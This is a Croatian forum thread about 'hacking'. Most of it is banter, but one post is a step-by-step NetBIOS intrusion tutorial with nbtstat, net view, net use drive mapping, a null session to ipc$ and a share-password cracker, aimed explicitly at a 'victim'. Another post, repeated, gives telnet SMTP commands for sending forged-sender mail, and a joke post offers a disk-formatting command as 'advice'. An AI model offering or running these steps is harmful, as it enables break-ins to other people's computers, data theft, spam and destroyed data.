View Full Version : Sve šta niste znali o hackiranju a željeli ste
Paranoid
02.10.2003., 17:44
Zanima me da li mi itko može preporučiti koji domaći sajt takve vrste sa tutorialima itd, bio bi jako zahvalan.
P.S. Moderator nemoj mi ovo brisati jer nemam loših namjera, samo edukacija ;)
butters
04.10.2003., 09:33
Paranoid kaže:
Domaći hakerski sajtovi
:lol: :lol: :lol:
Paranoid
04.10.2003., 12:44
butters kaže:
:lol: :lol: :lol:
:D :D :D :D
Paranoid kaže:
Zanima me da li mi itko može preporučiti koji domaći sajt takve vrste sa tutorialima itd, bio bi jako zahvalan.
Daj, daj pusti se toga, to su gluposti, nije ti to ko na filmovima da kad uletiš nekom na komp imaš grafičko 3d okruženje njegovog systema a po njemu se krećeš tipkovnicom...
Equilibrium
09.10.2003., 15:38
Mlaen kaže:
Daj, daj pusti se toga, to su gluposti, nije ti to ko na filmovima da kad uletiš nekom na komp imaš grafičko 3d okruženje njegovog systema a po njemu se krećeš tipkovnicom...
joystickom, kakva tipkovnica!!!! :D :D :D
Ali moraju oba kompa imat iste directX-e instalirane :D
nenoXtreme
09.10.2003., 15:47
'akerski ... 'akerski
:rolleyes:
Equilibrium kaže:
joystickom, kakva tipkovnica!!!! :D :D :D
Ali moraju oba kompa imat iste directX-e instalirane :D
Da ne zaboravimo i T3+ veza (trebaju ti podaci i dolaziti od nekud):D
'akiranje (;)) se svodi na Flight simulator:p
nenoXtreme
09.10.2003., 21:21
domaći 'akeri... :misli:
na šta bi to ličilo!???
nenoXtreme kaže:
domaći 'akeri... :misli:
na šta bi to ličilo!???
Nešto u stilu
'u, u da vidiš kakav virus sam napravio danas u Qbasicu'
ili
'našao sam neke skripte za mIrc, zakon; kakav sam ja 'aker eeee' - pa za par dana dođe opomena od CarNETa:D
:cool:
nenoXtreme
10.10.2003., 09:26
ha ha ha :D znači i ti si jedan od 'akera! :D
nenoXtreme kaže:
ha ha ha :D znači i ti si jedan od 'akera! :D
Ja ne, ali neki frendovi se trude:rolleyes:
Nije baš ko u filmovima (3D ekrani i sl.), ali da toga ima - ima. Neću imenovat lokaciju, no frend je prošli tjedan bio na jednom forumu iz security-ja i tip je za 10-tak sekundi razvalil 20-tak sajtova sa CISCO-vim firewall-om...
Da ne govorimo o zgodnoj mogućnosti kada npr. surfaš pomoću GPRS-a (mobitelom) i onda se ti "kao odpojiš". Frajer ti pokupi IP adresu i nastavi surfati na tvoj račun. Vidio to vlastitim očima. I da, sve to u Hrvatskoj.
Pa se vi sad ipak malo spustite na zemlju. :p
nenoXtreme
10.10.2003., 19:06
i ja znam jedan trik...
al vam ga neću odat jer nisam takav :D
(dakle nisam 'aker:D )
mlaki
FYI (for Your Info)
to nisu ni 'akeri, ni hakeri nego lopovi zbog kojih hakeri dolaze na zao glas (jer ovi potonji sebe nazivaju 'akerima... :rolleyes: )
Haker je jedno časno zanimanje i malo ih je dobrih...
proud do be 'aker T-shirts for only 39'99 €
mlaky kaže:
Nije baš ko u filmovima (3D ekrani i sl.), ali da toga ima - ima. Neću imenovat lokaciju, no frend je prošli tjedan bio na jednom forumu iz security-ja i tip je za 10-tak sekundi razvalil 20-tak sajtova sa CISCO-vim firewall-om...
Da ne govorimo o zgodnoj mogućnosti kada npr. surfaš pomoću GPRS-a (mobitelom) i onda se ti "kao odpojiš". Frajer ti pokupi IP adresu i nastavi surfati na tvoj račun. Vidio to vlastitim očima. I da, sve to u Hrvatskoj.
Pa se vi sad ipak malo spustite na zemlju. :p
Hej, nisam na novorio da su 'akeri neki mit ili nešto slično samo da ovim zelenima malo objasnim da nije to ko na filmovima. A 'akerom se možeš prozvat kad skušiš nešto sam a ne radit na tuđim forama:rolleyes:
nenoXtreme
10.10.2003., 23:22
"yes I agree" :D
ps jelda da je izraz 'aker do yaya! :D
nenoXtreme kaže:
"yes I agree" :D
ps jelda da je izraz 'aker do yaya! :D
:lol: do yaya do yaya :top:
www.hackgen.tk mozes otici na forum , a teme su hacking, cracking, phreaking, programming, i sve ostalo vezano uz security
(takoder, mozete pitati sto vas zanima)
JAO MAJMUNA VI MISLITE DA STE HAKER AKO STE NAPRAVILI VIRUS DA STE HAKER ILI AKO STE NEKOM UŠLI U MAIL ILI U KOMPJUTER POMOĆU HAKERSKOG PROGARAMA. PA AKO VAS BAŠ ZANIMA HAKERA NEMA U HRVATSKOJ NI U OKLOCI. HAKERI MOGU SVE NA SVIJETU ŠTO SE TIČE ELEKTROTEHNIKE, MOGU VAS IZBRISATI SA SVIJETA...
JAO MAJMUNA VI MISLITE DA STE HAKER AKO STE NAPRAVILI VIRUS DA STE HAKER ILI AKO STE NEKOM UŠLI U MAIL ILI U KOMPJUTER POMOĆU HAKERSKOG PROGARAMA. PA AKO VAS BAŠ ZANIMA HAKERA NEMA U HRVATSKOJ NI U OKLOCI. HAKERI MOGU SVE NA SVIJETU ŠTO SE TIČE ELEKTROTEHNIKE, MOGU VAS IZBRISATI SA SVIJETA...
Ovo je pretužno....
nenoXtreme
19.05.2006., 11:27
Ne... tužno je to što na tako dugačkom postu nije skužio CAPS lock :lol:
horny but sensitive
19.05.2006., 12:57
ma daj neki klinac to piše... kaj se opće obazirete na to...
...
Sta si hakere gledao neki dan :rofl:
Ti bokca ova je dobra:s :s :s
Samo naprijed majstore.Reci ti njima kaj ih ide:zubo: da se ne zacude kad budu izbrisani.:rofl: :rofl: :rofl:
no idea
21.05.2006., 11:23
ja nemam antivirus na svom kompu.
jel to znaci da i mene lako mogu obrisati? :tuzni:
Mini Me
21.05.2006., 14:20
ja nemam antivirus na svom kompu.
jel to znaci da i mene lako mogu obrisati? :tuzni:
:five:
Kex Doomlich
21.05.2006., 15:02
Pravi hakeri se ne exploatiraju javnosti...ako nađeš stranicu to će bit od nekih noobova kakav si i ti...
1337 :rozi:
:rofl:
e kad bi mene netko izbrisao pa da mi je sve iz pocetka... :)
no idea
21.05.2006., 19:55
e kad bi mene netko izbrisao pa da mi je sve iz pocetka... :)
iskljuci firewall i mogu zamolit jednog frenda 'akera koji bi ti mogao pomoci :s
nenoXtreme
21.05.2006., 20:00
pih... pravi 'aker more zmrdat i najbolji fajervol :)
no idea
21.05.2006., 20:02
pih... pravi 'aker more zmrdat i najbolji fajervol :)
naravno da moze ali cemu kad ttc ionako to zeli........bilo bi to gubljenje dragocjenog vremena mog prijatelja :s :D
ttc, javi jel ponuda vazi :ceka: :D
otrov31
22.05.2006., 14:01
hahahhaaaaaaaaa!!!!
JA CU RIKNIT!!!
hahahhaaaaaaaaa!!!!
JA CU RIKNIT!!!
Nemoj jos.:zubo:
Nek te prvo izbrisu:E :rofl:
AxMi-24
22.05.2006., 15:54
Mislio sam ovo pobrisat ali mislim da ću ipak stavit kao top temu pa da se nove generacije mogu učit hakeraju :D
nenoXtreme
22.05.2006., 17:29
Tako je AxMi ... znaš i sam da ovakvi threadovi s vremenom samo dobivaju na cijeni :)
Equilibrium
22.05.2006., 17:57
ali mislim da ću ipak stavit kao top temu
prvo sam pomislio da ti jebeno nisi normalan, ali mi je onda palo na pamet da na IT-u fakat više nema humora ko nekad davno.
Dobro će nam doći ovakve gluposti :D
AxMi-24
22.05.2006., 19:40
prvo sam pomislio da ti jebeno nisi normalan, ali mi je onda palo na pamet da na IT-u fakat više nema humora ko nekad davno.
Dobro će nam doći ovakve gluposti :D
Hehe :D
Istina je. Treba malo humora među svim genijalnim pitanjima :)
nenoXtreme
22.05.2006., 22:50
Ne samo to, nego ovi kikići danas opće nemaju respecta... počet ću opet dijelit savjete format c: /u /autotest :D
Equilibrium
23.05.2006., 07:39
to je savjet #1 :top:
:zubo:
AxMi-24
23.05.2006., 13:23
Tako i treba. A za ackiranje je IP 127.0.0.1 najbolji :D
nemate vi pojma sta je 'akiranje, da vidis vani sta rade ;) radio jedan program sto funkcionira sa msn-om, i google kakav je..naletim na neki 'ackersi sajt amera..i kao exploit msn-a ako ne mozete koristiti msn jer je blokiran group policyom..rijesenje je...pazi sad exploita..koristi webmesendjer...aha..pa ti vidi sto su ovi vanjski 'ackeri napredni..pih :rofl:
:s
There is no place like 127.0.0.1:zubo:
nenoXtreme
23.05.2006., 14:48
There is no place like 127.0.0.1
Equilibrium
26.05.2006., 18:37
There is no place like 127.0.0.1
AxMi-24
26.05.2006., 19:16
Niste li malo pretjerali. A kad smo već tu:
Only 10 kinds of people exist. Those that know binary and those that don't. :D
Equilibrium
26.05.2006., 19:36
Niste li malo pretjerali.
mi pretjerali????
a kaj je sa topic-starterom?
nenoXtreme
26.05.2006., 21:18
Niste li malo pretjerali. A kad smo već tu:
Only 10 kinds of people exist. Those that know binary and those that don't. :D
Pretjerali ti admini u brisanju postova ...
:D
AxMi-24
28.05.2006., 15:59
mi pretjerali????
a kaj je sa topic-starterom?
Tri puta ista fora malo zastari. Mada sumnjam da će topic starter skuži poantu i nakon tri puta :D
domaci hack site (tutorijali uglavno na hr. al se ne brinu o njemu vec neko vrijeme) www.ii-labs.org
ima li netko to s njuza ili otkud već dok je lik pizdio kaj su ga banali i rekao da će moderatoru disk preformatirat ako sazna njegov IP, a ovaj mu rekao da je 127.0.0.1 :D :D
to i "hardversku defragmentaciju diska" treba imati na sticky :top:
Znam vam jednu dobru foru.
Start>run> napiši cmd
enter
kada se otvori prozor napiši nslookup
enter
napiši set type=mx
enter
napiši yahoo.com (možete napisati bilo kojeg mail exchangera)
enter
Sada smo dobili nešto kao ovo:
> yahoo.com
Server: dns1.t-com.hr
Address: 195.29.150.3
Non-authoritative answer:
yahoo.com MX preference = 1, mail exchanger = mx2.mail.ya
yahoo.com MX preference = 1, mail exchanger = mx3.mail.ya
yahoo.com MX preference = 5, mail exchanger = mx4.mail.ya
yahoo.com MX preference = 1, mail exchanger = mx1.mail.ya
yahoo.com nameserver = ns4.yahoo.com
yahoo.com nameserver = ns5.yahoo.com
yahoo.com nameserver = ns1.yahoo.com
yahoo.com nameserver = ns2.yahoo.com
yahoo.com nameserver = ns3.yahoo.com
mx1.mail.yahoo.com internet address = 67.28.113.73
mx1.mail.yahoo.com internet address = 4.79.181.14
mx1.mail.yahoo.com internet address = 4.79.181.15
mx1.mail.yahoo.com internet address = 67.28.113.71
mx2.mail.yahoo.com internet address = 4.79.181.135
mx2.mail.yahoo.com internet address = 4.79.181.136
mx2.mail.yahoo.com internet address = 67.28.113.70
mx2.mail.yahoo.com internet address = 67.28.113.72
mx3.mail.yahoo.com internet address = 64.156.215.18
mx3.mail.yahoo.com internet address = 67.28.113.10
mx3.mail.yahoo.com internet address = 67.28.113.11
mx3.mail.yahoo.com internet address = 67.28.113.19
mx3.mail.yahoo.com internet address = 4.79.181.12
mx3.mail.yahoo.com internet address = 4.79.181.13
mx3.mail.yahoo.com internet address = 4.79.181.134
mx4.mail.yahoo.com internet address = 64.156.215.8
mx4.mail.yahoo.com internet address = 66.218.86.156
mx4.mail.yahoo.com internet address = 66.218.86.254
ns1.yahoo.com internet address = 66.218.71.63
pogledaj na onaj dio gdje piše mx1.mail.yahoo.com, adresa je 67.28.113.73.
U biti piše "mx1.mail.yahoo.com je mail exchanger za domenu yahoo.com i njegova ip adresa je 67.28.113.73.
napiši exit
enter
napiši telnet 67.28.113.73
enter
napiši hello 192.168.0.1
enter
Ako veli "hello, my name is 192.168.0.1"
napiši MAIL FROM: ime@yahoo.com
enter
RCPT TO: cilj@yahoo.com
napiši data i svoju poruku
kada si završio napiši .
enter
napiši exit
enter
GOTOVO!:cool:
marco's
26.06.2006., 09:17
i za kaj to služi??
nenoXtreme
26.06.2006., 09:48
za slanje spama s nepostojeće mail adrese?
ja bi ga bano da sam mod :zubo:
Zašto bi me bano?
Nisam ništa loše napiso.
nenoXtreme
26.06.2006., 13:36
pa nisi... samo jožu malo jebe vrućina ovih dana :D
:mig:
The Uništavač Topika
12.07.2006., 14:30
E pa, definitivno jedan od najdebilnijih načina 'akiranja je pogađanje. Recimo, oćete 'akirati mail od Mirka Fodora. I recimo naprimjer da je njegov mail mirko_fodor@hotmail.com. Onda se informirate kojeg je datuma Mirko Fodor rođen i kako mu se zove mama. Kod mnogih ljudi će nešto od toga u 90% slučajeva biti šifra. I sad ste pravi 'aker.
Tko na linuxu koristi K-mail može kao odlaznu upisati bilo koju E-mail adresu, nepostojeću, i poslati mail :D
abaskovi
17.07.2006., 23:28
LJUDI MOJI KOJE STE VI NAIVNIČINE I NEZNALICE. PA JA MOGU SA MOJIM ZNANJEM I COMP SVE NA OVOM SVIJETU, ALI TO MOŽE SVAK ALI TREBA ZNAT..........:E :E :E :E :E :E :E :E :E
Mini Me
18.07.2006., 01:04
like ZOMG lik je fakat virus stavio u svoj post ak ga quotate :s
al dobro avast je regirao na vrijeme :D
horny but sensitive
18.07.2006., 10:27
ovog #abaskovi treba dobro nalupat po guzici remenom...
sad se tu javlja, a javio se i na topic di je #drito sastavljao komp želeći da se njemu pošalje... svašta
ovog #abaskovi treba dobro nalupat po guzici remenom...
sad se tu javlja, a javio se i na topic di je #drito sastavljao komp želeći da se njemu pošalje... svašta
:tuctuc:
Znam vam jednu dobru foru.
Start>run> napiši cmd
enter
kada se otvori prozor napiši nslookup
enter
napiši set type=mx
enter
napiši yahoo.com (možete napisati bilo kojeg mail exchangera)
enter
Sada smo dobili nešto kao ovo:
> yahoo.com
Server: dns1.t-com.hr
Address: 195.29.150.3
Non-authoritative answer:
yahoo.com MX preference = 1, mail exchanger = mx2.mail.ya
yahoo.com MX preference = 1, mail exchanger = mx3.mail.ya
yahoo.com MX preference = 5, mail exchanger = mx4.mail.ya
yahoo.com MX preference = 1, mail exchanger = mx1.mail.ya
yahoo.com nameserver = ns4.yahoo.com
yahoo.com nameserver = ns5.yahoo.com
yahoo.com nameserver = ns1.yahoo.com
yahoo.com nameserver = ns2.yahoo.com
yahoo.com nameserver = ns3.yahoo.com
mx1.mail.yahoo.com internet address = 67.28.113.73
mx1.mail.yahoo.com internet address = 4.79.181.14
mx1.mail.yahoo.com internet address = 4.79.181.15
mx1.mail.yahoo.com internet address = 67.28.113.71
mx2.mail.yahoo.com internet address = 4.79.181.135
mx2.mail.yahoo.com internet address = 4.79.181.136
mx2.mail.yahoo.com internet address = 67.28.113.70
mx2.mail.yahoo.com internet address = 67.28.113.72
mx3.mail.yahoo.com internet address = 64.156.215.18
mx3.mail.yahoo.com internet address = 67.28.113.10
mx3.mail.yahoo.com internet address = 67.28.113.11
mx3.mail.yahoo.com internet address = 67.28.113.19
mx3.mail.yahoo.com internet address = 4.79.181.12
mx3.mail.yahoo.com internet address = 4.79.181.13
mx3.mail.yahoo.com internet address = 4.79.181.134
mx4.mail.yahoo.com internet address = 64.156.215.8
mx4.mail.yahoo.com internet address = 66.218.86.156
mx4.mail.yahoo.com internet address = 66.218.86.254
ns1.yahoo.com internet address = 66.218.71.63
pogledaj na onaj dio gdje piše mx1.mail.yahoo.com, adresa je 67.28.113.73.
U biti piše "mx1.mail.yahoo.com je mail exchanger za domenu yahoo.com i njegova ip adresa je 67.28.113.73.
napiši exit
enter
napiši telnet 67.28.113.73
enter
napiši hello 192.168.0.1
enter
Ako veli "hello, my name is 192.168.0.1"
napiši MAIL FROM: ime@yahoo.com
enter
RCPT TO: cilj@yahoo.com
napiši data i svoju poruku
kada si završio napiši .
enter
napiši exit
enter
GOTOVO!:cool:
Jel to ilegalno? :misli:
Jel opcenito koristenje tog nslookup i type MX (set type=mx) ilegalno? Ne znam bas nista o tome...:misli:
CROcker
14.09.2006., 21:19
Evo jos nechega:
CROcker
14.09.2006., 21:20
IP
Internet protocol adress(IP) je brojčani identifikator nekog uređaja ili računala u mreži temeljenoj na TCP/IP protokolu.Svaka Ip adresa ima 32-bitni brojčani oblik,odnosno format kao četvorke odvojene razmacima,pri čemu svaki broj može biti 0 do 255.Primjer ip adrese može biti 1.170.10.259.Takav način se je prije koristio više dok nije došao FQDN način kakav imamo danas primjerice FQDN je http://infotechnology.blog.hr gdje umjesto brojeva upisujemo adresu.Mnoge možda zanima kako pronaći svoju ip adresu,za to postoje mnogi gotovi programi,ali oni su zapravo besmisleni.Svoju ip adresu možete saznati kliknuvši na ikonu na konekciju koja se kada je računalo spojeno na internet nalazi u donjem desnog kutu launch trake.Dvostruki klik na tu ikonu,details pokazat će vam neke detalje o uspostavljenoj konekciji,client ip adress vaša je ip adresa,a server ip adress je ip adresa servera na kojeg ste spojeni.To je jedan način,a drugi način je moguć iz command prompta,dakle odete na start/run/ i upišete cmd ili command i pokrenut će se crni ekran tj.command,u njemu sada upišete naredbu ipconfig i stisnete enter i dobit ćete svoju ip adresu na internetu ostvarenu ovom konekcijom.
Dakle,ovo su bila dva načina kako saznati vašu ip adresu,no možda vas zanima kako saznati ip adresu od nekog servera ili web stranice,za to posđstoje također gotovi programi od kojih preporučam "IPFinder" u kojem samo upišete adresu web stranice(hostname) i on će vam pronaći ip web stranice ili servera od kojga želite pronaći ip adresu.Ako vam se baš ne sviđa ovaj način,postoji još jedna način kako to saznati,a to je naravno preko commanda dakle,odete na run,upišete cmd ili command,i u crnom ekranu commanda upišete naredbu PING i adresu stranice ili servera primjerice PING infotechnology.blog.hr i dobit ćete ip adresu željene stranice ili servera.Ping je naredba(program) koja djeluje tako da šalje paket podataka na određenu adresu i čeka odgovor da li je određena internetska adresa dostupna,ako je kao odgovor dobiva se njena ip adresa.Dakle,ovo su bili neki od načina dobivanja ip adresa bez kojih hakeri i crackeri ne mogu zamisliti svoj rad jer je poznavanje adrese kompjutora koji se "napada"(target computer)neophodno da bi se "provalilo" u nečije računalo osobito sa NET BIOS tehnikom hakiranja.
--- Bios---
Bios je skraćenica za basic input/output sustav tj.osnovni ulazno izlazni sustav kojim omogučuje pokretanje računala.To ej u računalo unaprijed ugrađen(tvornički) softver koji nadzire sve akcije prilikom podizanja operativnog sustava.Bios sadrži sav kod potreban za nadziranje tipkovnice,zaslona,diska i ostalih pogona.Bios se nalazi na Rom(read only memory) tako da je zaštičen ako dođe do kvara diska.
---Netbios---
NetBIOS (Network Basic Input/Output System) razvijen je od strane tvrtke IBM i Sytek koji omogučuje pristup LAN(Local area network) resursima.Sigurno smo mnogo puta kliknuli na ikonu Network Neighborhood,no znamo li što se točno dogodi kada kliknemo na tu ikonu???Naše računalo pokušava dobiti imena računala spojenih na mrežu koristeći komandu Netbios.Osim toga daje različite informacije o kompjutorima spojenima u mreži npr.:
Name of the computer-ime računala
Username-korisničko ime
Domain-tip domene...kao i imena drugih servisa koji rade na portu.(port je 139)
Dakle,ovo su bile neke osnovne informacije koje treba znati za korištenje ove tehnike,a sada prijeđimo na drugi dio tutoriala...
Second lesson
Comanda nbstat
Sa NetBiosom može se povezati koristeći naredbu Nbtstat.Naredba se upisuje u command prompt,ali!taj command moramo sami naredbi iz razloga što postoji caka za probijanje vatrozida.
Izrada commanda:Odemo na desktop,desni klik miša,new i izaberemo New tekst dokumnet,uđemo u njega i napišemo command.com te spremimo dokument pod imenom batch.bat dakle dobijemo batch aplikaciju.Na desktopu će se tada pojaviti ta batch aplikacija u koju uđemo dvostrukim klikom miša.
Ako nemožete napraviti taj batch file znači da vam je uključen vatrozid zato preporučam da ga isključite kada ovo radite.Nakon toga dok uđete u taj kreirani command trebala bi vam se pojaviti ova staza:c:\windows> .Ako želite dobiti informacije o svom računalu pišete:
c:\windows> nbtstat -A 127.0.0.1.Kod pisanja nbstat -A mora biti veliko !!!s dos nieje case sensitive ali....Nakon toga dobit ćete sljedeće informacije:
NetBIOS Remote Machine Name Table
Name Number Type Usage
=======================================
workgroup 00 G Domain Name
my_computer 03 U Messenger Service
myusername 03 U Messenger Service
MAC Address = 00-02-44-14-23-E6
Odma da razjasnimo 127.0.0.1 ip adresa nije adresa nekog target computera već se naziva Loop back ip adresa i to je uvijek adresa vašeg kompjutora.
Dakle ovo je bio samo banalan primjer korištenja ove naredbe,a ako želite sve o ovoj naredbi u commandu upišite:c:\windows>nbtstat/? čime ćete dobiti detaljnije upute za korištenje ove naredbe.
---Što nam je potrebno za hakiranje??---
Potreban je samo operacijski sustav windows i konekcija na internet.
---TYPES OF ATTACKS -tipovi napada---
1. Reading/Writing to a remote computer system
2. Denial of Service
---Searching for a victim-traženje žrtve---
Žrtvu možete tražiti "pješice" koristeći naredbu netstat a-ip adresa,alo to nije potrebno jer postoje mnogi gotovi port skeneri.Dakle,ukoliko ne znate ip adresu računala u koje želite upasti možete je naći preko port skenera kao što su "orge" i još prema mojoj procjeni najbolje. "Xsharez" skenera.Ti skeneri pretražuju sve ip adrese na 139 portu i otkrivaju dali postoji moguća točka ulaza "point of entry".
Da se razumijemo ova tehnika se može izvoditi samo u windows os-u i primjenivati se samo na ona računala koja imaju uključenu opciju File and printer sharing.To i je jedna vrlo velika greška u windowsima jer ako ste primjerice spojeni u mrežu sa prijateljem i izmjenjujete podatke pristup vašim podacima imaju i sve ostale osobe sa interneta osim ako niste postavili premissions.
Dakle,pretpostavimo da sada već imate ip adresu računala u kojeg želite upasti pa prijeđimo na treći dio tutoriala sam čin hakiranja.!
treca lekcione
Uzmimo primjerice da je ip adresa kompjutera kojega želite hakirati 193.198.136.156(molim da ne hakirate taj kompjuter).U command promptu pišete slijedeće:
c:\windows>nbtstat -A 193.198.126.156 i pritisnete enter.Uzmimo da ćete kao povratnu informaciju dobiti slijedeće:
Name Type Status
---------------------------------------------
user <00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered user
<20> UNIQUE Registered
Broj 20 pokazuje da žrtva ima uključenu opciju File and printer Sharing dakle da shera podatke na netu.
Ako niste dobili ovakve povratne informacije to znači osoba nema uključenu opciju File and printer sharing ili da je port 139 za tu ip adresu zatvoren jer ona ne postoji.
Ako ste dobili dobre povratne informacije naš sljedeći korak je da vidimo koje to foldere žrtva shera.
Za to koristimo naredbu:
c:\windows>net view \\198.193.136.156
Uzmimo da ćemo kao odgovor dobiti sljedeće:
Shared resources at \\198.193.136.156
ComputerNameGoesHere
Share name Type Used as Comment
-------------------------------------------
CDISK Disk
The command completed successfully.
"Disk" pokazuje da žrtva shera podatke na disku C,a osim toga dobijete i informacije kao:
Shared resources at \\203.195.136.156
ComputerNameGoesHere
HP-6L Print
Print pokazuje da žrtva shera printer imena HP-6L.
Poznati su slučajevi kada su osobe imale uključenu opciju sheranja printera,ali ne znajući da to može imati i svoju lošu stranu jer su im krekeri tada slali prijeteće poruke koristeći njihov printer.
Dakle,sada smo u stanju dijeliti podatke sa žrtvinog diska ili foldera,a ako je uključena opcija Printer sharing i njegov printer.Sada ćemo se priključiti na hard disk target computera.
Za to koristimo naredbu Net koja izgleda ovako:
c:\windows>net use k: \\193.198.136.156\CDISK
"k" možemo zamjeniti sa bilo kojim slovom, pod CDISK upisujemo ime diska target computera.
Ako je naredba uspješno izvršena dobit ćemo odgovor:
The command was completed successfully
Nakon ovoga odete ne desktiop,My Computer i vidjet ćete osim imena svojih diskovnih pogona i ime Target computera,sada samo dvostruki klik i u njemu ste(ovisi koju vrstu veze koristite,ako je to Dsl to će biti vrlo brzo,ako koristite 56k modem to će potrajati nekoliko minuta.
Nakon što uđete,uživajte svoj prvi hack!
------razbijanje šifri za sheranje---
Ponekad kada korisitmo "net use k: \\ipaddress\sharename" pita nas se za šifru.
Za OS windows 95.98 i mil koristimo program POWAK, a sve što trebamo upisati je ip adresa žrtve i share ime(u našem slučaju Cdisk) i program će razbiti enkripciju za par sekundi.
Ako koristimo WIn xp,Nt ili 2000 koristimo IPC$ ,to nije program za razbijanje šifre,već samo string koji od operativnog sustava traži da nam dade pristup računalu kao gost,bez da nas pita šifru.
c:\windows>net use k: \\123.123.123.123\ipc$ "" /user:""
I nakon toga dobit ćete pristup žrtvinom računalu tj. podacima koje shera i bit sposobni čitati njegove tajne E-mailove,downloadati glazbu...naravno sve će ovisiti o brzini vaše veze.
to je to maj pipl
odgovorko
24.09.2006., 19:44
Što je s tim virusima.
Što sam više na internetu, to više vjerujem da viruse proizvode tvrtke koje prave antivirusne programe ili netko tko je snima u dogovoru. Nisam od onih koji vide zavjere na svakom koraku, no sve mi nekako liči na to.
Vidi lli itko svrhu postojanja virusa. Kakvog ima smisla to što ti u računalo udje neki programčić koji radi neku bezvezariju (koja često nije niti fatalna, ali ti je računalo dovoljno sosobno da kupis i instaliras antivirus).
Zašto bi bilo tko to pravio.
Ako nije to, što je onda? Zar doista ima toliko dokonih hakera da distribuiraju viruse. S kojom svrhom. Svrhe nema.
Ne znam, internet će uskoro biti na rubu kolapsa. Medij kojeg nije moguće kontrolirati. Ispitao bih za pocetak svaku tvrtku koja pravi antivirusne programe.
dalmacija77
30.10.2006., 07:42
Crocker mozes li molim te reci kako se zastititi od tog upada u komp, tj. sta da napravim da mi nitko ne moze uci u racunalo, i kada napravis ovo sta si napisa gori jeli taj koji upada ima pristup samo tvojim sharing folders ili svim dokumentima koje imas na kompu? Hvala!
dalmacija77
30.10.2006., 07:48
i di se iskljucuje opcija file and printer sharing?
totalchaos
30.10.2006., 08:18
Najjednostavnije...pod uvjetom da to nikad ne koristis ->
desni klik na tvoju konekciju/properties/network tab/odbiljezi i deinstaliraj File and printer sharing for Microsoft network
al to ti stvarno ne treba....mange koje se bave upadima definitivno nece gubiti vrijeme na upade u tvoj PC....
dalmacija77
30.10.2006., 08:57
evo sam deinstalira...a kako se vrati nazad?
I postoji li jos koji nacin da ti netko udje u racunalo ili poslaje virus ili napravi neku stetu daj malo pojasnite?
dalmacija77
30.10.2006., 08:59
bas sam prije par dana upalio komp kad ono fale ikonice od igara, pa su mi nestale neke igre koje imam za sharenje itd.
dalmacija77
30.10.2006., 09:29
i mogu li sada korisiti utorrent kad sam to maka ili moram vratit tu opciju?
totalchaos
31.10.2006., 15:50
to je samo za sharing unutar microsoft mreza...LAN-a... ne sekiraj se...sve ti ostalo radi kako ura...
dalmacija77
31.10.2006., 18:40
kako zatvoriti portove?
kako zatvoriti portove?
Start --> Turn Off Computer
totalchaos
01.11.2006., 17:47
Start --> Turn Off Computer
e jebemu ovo je najbolja danas
:s
CROcker jel to bas bilo neophodno postat..jebiga vec vidim tonu klinaca kak skeniraju 139...
columbo23
02.11.2006., 21:43
Ljudi... pomoć! Nabavio sam neku staru kantu od kompa ali su winNT zasticeni sifrom administratora pa me zanima kako to zaobici ili da li se moze hard nekako totalno fizicki izbrisati (sa win) jer mi ne treba nista s tog harda ali se ne mogu ulogirati.... probao sam neki bootable disk (floppy) ali nije uspjelo pa ako netko neki nacin ili preporuku bio bi zahvalan!!!
dalmacija77
03.11.2006., 21:31
evo sad mi ne radi windows live messenger ne moze sign in zna li netko u cemu je problem???
dalmacija77
03.11.2006., 21:34
sta je s onim client for microsoft network jeli tu mora bit aktivirano ili ne?
sta je s onim client for microsoft network jeli tu mora bit aktivirano ili ne?
Netreba
Inače ja sam danas haknuo adresu http://localhost... Bile su neke php skripte pa sam sve to tom jadnom tipu pobriso :rofl:
Etna1234
05.11.2006., 11:48
Netreba
Inače ja sam danas haknuo adresu http://localhost... Bile su neke php skripte pa sam sve to tom jadnom tipu pobriso :rofl:
:rofl: :rofl: :rofl: Hebeš Pentagon ovo stvarno treba znat haknut
Ne radi ti link :confused:
Kad ga je haknuo:kava:
Ne to raditi.Ne.:nono:
jao zeleni kak si glup :flop:
Kad ga je haknuo:kava:
:top:
Pa da, kak će se vidit ako sam ga haknuo...
A nešto mi je čudno baš kad sam tom tipu haknuo tu adresu prestala mi je radit adresa http://127.0.0.1 .... valjda mi se osvetio, majmun jedan
A nešto mi je čudno baš kad sam tom tipu haknuo tu adresu prestala mi je radit adresa http://127.0.0.1 .... valjda mi se osvetio, majmun jedan
Ni taj link ti ne radi :confused: Pa daj nemoj davat linkove koji ne rade, prijavit ću te moderatoru :top:
Bravo majstore.:rofl:
@ Joz@ kaj bi mi bez hocu internet generacije:zubo:
Bila bi cista dosada:kava:
@ Joz@ kaj bi mi bez hocu internet generacije:zubo:
Bila bi cista dosada:kava:
:eek:
sqrtbug
14.11.2006., 21:01
Probaj ti HACKmac:)
neznam, kako oni tsoje po tom pitanju?
daaamir
26.11.2006., 13:19
ima li netko to s njuza ili otkud već dok je lik pizdio kaj su ga banali i rekao da će moderatoru disk preformatirat ako sazna njegov IP, a ovaj mu rekao da je 127.0.0.1 :D :D
to i "hardversku defragmentaciju diska" treba imati na sticky :top:
To ti je bila provala sa tipom na icq, jako dugooo se kurcio da ce svima u grupi obrisat diskove samo da im da IP, nakon nekog vremena mu je ekipa dala 127.0.0.1 i rekao je da im redom brise particije d,e,f ali kada je došlo do c particije samo je ispo iz kanala(ima negdi na netu transkript irc-a)
raver_kde
30.11.2006., 21:33
heh, dobra tema, malo smijeha..
btw, masa ljudi koristi izraz haker za osobu koja probija zastite sto uopce nije tocno..
rijec haker je stara 30-ak godina i znaci (znacila je prije dok je mediji nisu preokrenuli) osoba koja voli programirati..
a da bi mogao nekoga haknut treba jako dobro poznavati programiranje, operacijske sustave, nije to tako jednostavno.. da upisem dvije rijeci, kliknem 2 puta misem i upadnem nekom u komp, malo sutra..
heh, dobra tema, malo smijeha..
btw, masa ljudi koristi izraz haker za osobu koja probija zastite sto uopce nije tocno..
rijec haker je stara 30-ak godina i znaci (znacila je prije dok je mediji nisu preokrenuli) osoba koja voli programirati..
a da bi mogao nekoga haknut treba jako dobro poznavati programiranje, operacijske sustave, nije to tako jednostavno.. da upisem dvije rijeci, kliknem 2 puta misem i upadnem nekom u komp, malo sutra..
Topla voda je upravo otkrivena :s
red_shrike
07.12.2006., 12:41
strava i uzas. Uskoro ce mo svi nestat jer ce nas zli 'akeri izbrisat. weapons of math destruction. Muahahahahha
-ParadoX-
09.12.2006., 11:52
Imas ilegalnih sajtova za to....Ja sam upao u mrezu problema i dosal mi kazna od 500 eura zbog hackerstva....Sad sam mis kad sam na netu...
monodox
